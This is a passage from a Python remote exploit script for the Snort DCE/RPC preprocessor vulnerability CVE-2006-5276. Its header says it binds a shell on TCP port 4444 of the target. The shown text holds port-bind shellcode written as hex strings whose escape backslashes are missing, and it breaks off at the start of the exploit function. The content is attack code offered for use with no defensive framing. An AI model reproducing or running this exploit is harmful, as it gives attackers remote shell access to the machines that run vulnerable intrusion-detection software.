No description provided by source.
#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from scapy import *
# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode = \"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96\"
shellcode += \"x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56\"
shellcode += \"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1\"
shellcode += \"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0\"
shellcode += \"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53\"
shellcode += \"x89xe1xcdx80\"
def ExploitSnort(target):
# SMB packet borrowed from http://www.milw0rm